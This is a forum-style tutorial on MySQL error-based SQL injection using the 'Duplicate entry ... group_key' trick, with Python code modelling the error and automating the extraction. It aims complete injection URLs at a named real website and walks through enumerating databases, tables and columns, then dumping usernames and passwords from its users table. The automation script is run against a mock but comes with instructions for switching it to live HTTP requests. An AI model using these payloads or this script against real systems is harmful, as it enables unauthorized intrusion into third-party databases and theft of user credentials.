Friday 29 August 2014

ERROR BASED SQLI

Hey guys,
In this tutorial I'll be explaining another type of error-based SQL injection: the one that leaks data through MySQL's "Duplicate entry ... for key 'group_key'" error.
I call it Union-Error based, since the payloads use UNION SELECT to build the few rows that are needed to make the error fire.

So let's get started
In this example we're going to use this site (a member asked about it in -Downfall's thread):

Code:

http://www.seenpm.org/

The vulnerable parameter is id; appending a single quote to it breaks the query:

Code:

http://www.seenpm.org/new/index.php?id=151'

Before I go further, let me explain the SQL functions and tables we're going to use in this tutorial, so that you understand how the query works. Please read carefully.

Code:

count(*)            = returns the number of rows in the (sub)query
group by            = groups the rows by one or more expressions; MySQL stores the distinct group keys in a temporary table
concat()            = joins several strings into one
concat_ws(sep, ...) = joins strings with a separator; we use 0x7e (~) so the leaked value ends in ~~
group_concat()      = joins a column's values from all rows into one comma-separated string
information_schema  = MySQL's metadata database; .schemata lists the databases, .tables the tables, .columns the columns
table_schema        = column of information_schema.tables/columns holding the database name
table_name          = column of information_schema.tables/columns holding the table name
limit               = limits how many rows are returned (limit 0,1 = the first row only)
mid(str, pos, len)  = returns len characters of str, starting at position pos (counted from 1)
floor(rand(0)*2)    = 0 or 1 from MySQL's seeded random generator; this is what triggers the error

How the trick works: rand(0) is seeded, so it produces the same 0/1 sequence on every run (0, 1, 1, 0, 1, 1, ...). When GROUP BY groups on concat(<our data>, floor(rand(0)*2)), MySQL evaluates the key once to look the group up and again when it inserts a new group row into the temporary table. By the third row the re-evaluated key collides with a key that was already inserted, and MySQL aborts with "Duplicate entry '<our data>1' for key 'group_key'", so our data ends up in the error message. That is why every payload below builds a derived table of at least three rows (select 1 union select 2 union select 3, or 1, null and !1).
See more of the functions here:
http://www.w3schools.com/sql/sql_functions.asp
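To see the collision concretely, here is an added example in Python (not from the original post). It reproduces MySQL's RAND(seed) generator (my_rnd() from mysys/my_rnd.c, seeded the way Item_func_rand does) and models the GROUP BY temporary table with the key evaluated once on lookup and again on insert. The temp-table part is a model of the server's behaviour, not server code, and the "5.1.54" leak string is a made-up stand-in for whatever the inner select returns; whether a given MySQL version still behaves this way is something you check against the version string you get back.

```python
# Added example (not part of the original post): a model of why
# GROUP BY CONCAT(<leak>, FLOOR(RAND(0)*2)) over three or more rows makes
# MySQL raise "Duplicate entry ... for key 'group_key'".

MAX_VALUE = 0x3FFFFFFF  # my_rnd() max_value


class MySQLRand:
    """Reproduces the sequence MySQL's RAND(seed) returns
    (mysys/my_rnd.c, seeded as Item_func_rand::seed_random does)."""

    def __init__(self, seed):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def next(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_bits(seed, count):
    """FLOOR(RAND(seed)*2) for the first `count` evaluations."""
    rng = MySQLRand(seed)
    return [int(rng.next() * 2) for _ in range(count)]


def group_by_duplicate(row_count, leak="5.1.54", seed=0):
    """Model of the GROUP BY temp table for `row_count` rows whose group key
    is CONCAT(leak, FLOOR(RAND(seed)*2)).  The key is evaluated once to look
    the group up and again when a new group row is inserted.  Returns MySQL's
    error text if the insert collides with an existing key, else None."""
    rng = MySQLRand(seed)
    groups = set()
    for _ in range(row_count):
        lookup_key = leak + str(int(rng.next() * 2))   # evaluated for the lookup
        if lookup_key in groups:
            continue                                    # existing group: count += 1
        insert_key = leak + str(int(rng.next() * 2))   # re-evaluated on insert
        if insert_key in groups:
            return "Duplicate entry '%s' for key 'group_key'" % insert_key
        groups.add(insert_key)
    return None


if __name__ == "__main__":
    print(floor_rand_bits(0, 6))    # [0, 1, 1, 0, 1, 1]
    print(group_by_duplicate(2))    # None: two rows are not enough
    print(group_by_duplicate(3))    # Duplicate entry '5.1.541' for key 'group_key'
```

With the sequence 0, 1, 1 the first row is looked up under key ...0 but inserted under ...1; the second row finds ...1 and is counted; the third row is looked up under ...0, not found, and inserted under ...1 again, which is the duplicate. Two rows never get that far, which is why the derived table in the payloads has three.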

NOTE: If you copy and paste a query, check its spacing first: the forum wraps long lines and can insert stray spaces. In the URL every space is written as +.

Getting the version of the database (two main ways to do it):
First way:
Query:

Code:

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

Results:

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

Second way:
Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

Results:

Code:

Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'

Screenshot:

[Image: lOnau.png]

Now that we've got the version, let's extract the database names:

Query used:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata+limit+0,1),1,150),floor(rand(0)*2)))a)--+x

URL will look like this:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata+limit+0,1),1,150),floor(rand(0)*2)))a)--+x

Results:

Code:

Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'

Note: Notice the limit 0,1),1,150).
This is the part where I raised the length argument of mid() from 25 to 150, so that the whole list of database names fits in one error message, in case there had been more databases. The ~~ after seenpm_2007 shows that the list is complete.
I'll explain more about the mid() function in the next step.

Screenshot:

[Image: QxgVN.png]

So far we have the version and the database names.

Now for the tables in the current database:

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

Results:

Code:

'links,members,menu,menu_s1' for key 'group_key'

Now read this carefully, and notice how the tables aren't completely shown.
Only the first 25 characters of the list appear. This is because of the mid() function we're using. Also note that the trailing 1 is the floor(rand(0)*2) digit, not part of a table name: the last table in that window is really menu_s..., cut off by the window.

Leave the limit 0,1 alone and don't touch it.

What you need to alter now is the integers of the mid() function,
i.e. mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,25)

Yes, that's right. Notice 1,25.
25 is the length of the window. It can be altered too, but it's a moderate value, so leave it like that.
The number 1 is the position where the window starts, and that is what you increment: 1,25 shows characters 1 to 25 of the list, 26,25 shows 26 to 50, 51,25 shows 51 to 75, and so on, until the ~~ terminator turns up.

Stepping through the list on this site, the 'users' table shows up in the window starting at position 58, i.e. 58,25.

So the query with the URL will look like:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables+where+table_schema=database()+limit+0,1),58,25),floor(rand(0)*2)))a)--+x

Results:

Code:

Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'

Screenshot:

[Image: AVmxf.png]

Now for the columns in the chosen table, i.e. users:

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns+where+table_name=0xHex_Table+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

Notice you have to write the table name as a hex literal (0x...), which keeps quotes out of the injection.
To convert it you can use http://www.swingnote.com/tools/texttohex.php (MySQL's HEX() function gives the same result: users is 7573657273).

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),4,25),floor(rand(0)*2)))a)--+x

Now notice the mid() function.
I've moved the window from 1,25 to 4,25, skipping the first three characters of the column list so that the columns we care about fit in the window. As before, the trailing 1 is the rand digit: the fourth column name is cut off after "n".

Result:

Code:

'username,password,email,n1' for key 'group_key'

Screenshot:

[Image: oOnBR.png]

Now to extract the data from the desired columns.
Columns we have so far: "username", "password"

Query:

Code:

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

URL:

Code:

http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users+limit+0,1),1,25),floor(rand(0)*2)))a)--+x

Results:

Code:

Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'

Notice how I didn't increment the mid() function this time.
That's because the content is completely shown: you know the data is complete when the ~~ (the two 0x7e separators from concat_ws) appears in the window, just before the trailing rand digit.
Keep in mind that group_concat() is cut off at group_concat_max_len (1024 characters by default), so on a big table this only gives you the first rows; to go further, drop group_concat and walk the rows one at a time with limit 0,1, limit 1,1 and so on in the inner select.

Screenshot:

[Image: 057wa.png]

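The offset stepping from the tables step and the ~~ check from this last step are easy to script. The following is an added Python example, not code from the original post: it builds the post's payload around any inner select, pulls the leaked window out of the "Duplicate entry" message, drops the trailing rand digit, and advances mid()'s starting position until the ~~ terminator shows up. TARGET is the injection point from the post, but nothing here talks to the network: make_mock_target is a constructed stand-in that applies the mid() window to a known string and answers with the error text a MySQL server would produce, and the TABLES list is made up in the style of the post's output, not the real site's.

```python
# Added example (not from the original post): automating the offset stepping
# the post does by hand.  Offline: the "server" below is a constructed stand-in.
import re

TARGET = "http://www.seenpm.org/new/index.php?id=151"   # injection point from the post
ERROR_RE = re.compile(r"Duplicate entry '(.*?)' for key 'group_key'")
TERMINATOR = "~~"   # concat_ws(0x7e, <data>, 0x7e) appends "~~" to the data


def hex_literal(text):
    """MySQL hex literal for a string, e.g. 'users' -> 0x7573657273 (no quotes needed)."""
    return "0x" + text.encode().hex()


def payload(inner_select, offset, length=25):
    """The post's payload with mid(<inner>, offset, length) as the window.
    Spaces are written as + so the string can be appended straight to TARGET."""
    return ("+and+(select+1+from+(select+count(*)+from+"
            "(select+1+union+select+2+union+select+3)x+group+by+"
            "concat(mid((%s),%d,%d),floor(rand(0)*2)))a)--+x"
            % (inner_select, offset, length))


def parse_leak(body):
    """Return the leaked window from the error page, or None if there was no
    MySQL error.  The last character is the 0/1 from floor(rand(0)*2), not data."""
    m = ERROR_RE.search(body)
    return m.group(1)[:-1] if m else None


def extract(send, inner_select, length=25, max_len=4096):
    """Slide the mid() window over the leaked string (1,len then 1+len,len ...)
    until the ~~ terminator or an empty window appears; return the data only."""
    collected, offset = "", 1
    while offset <= max_len:
        chunk = parse_leak(send(TARGET + payload(inner_select, offset, length)))
        if chunk is None:
            raise RuntimeError("no MySQL error in response at offset %d" % offset)
        collected += chunk
        if TERMINATOR in collected or len(chunk) < length:
            break
        offset += length
    return collected.split(TERMINATOR)[0]


def make_mock_target(secret):
    """Constructed stand-in for the vulnerable page: reads offset and length
    out of the payload, applies that mid() window to `secret` plus the ~~ that
    concat_ws would add, and returns MySQL's error text with the rand digit."""
    def send(url):
        m = re.search(r"\),(\d+),(\d+)\),floor\(rand\(0\)\*2\)", url)
        offset, length = int(m.group(1)), int(m.group(2))
        window = (secret + TERMINATOR)[offset - 1:offset - 1 + length]
        return "Duplicate entry '%s1' for key 'group_key'" % window
    return send


# Constructed table list in the style of the post's output (not the real site's).
TABLES = "links,members,menu,menu_s1,news,pages,u_page,u_par,users"
TABLE_QUERY = ("select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+"
               "information_schema.tables+where+table_schema=database()+limit+0,1")

if __name__ == "__main__":
    send = make_mock_target(TABLES)
    print(TARGET + payload(TABLE_QUERY, 58))
    print(extract(send, TABLE_QUERY))
    print(hex_literal("users"))
```

Against a live host you would replace send with a function that performs the HTTP GET and returns the response body; the loop and the parsing stay the same. The group_concat_max_len cap applies here as well: once the leaked string stops growing without a ~~, you have hit the cap, not the end of the data, and should switch the inner select to one row at a time.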
Note:

All information on this forum is for educational purposes only.
We are not responsible for any attacks that are carried out on networks, websites or servers.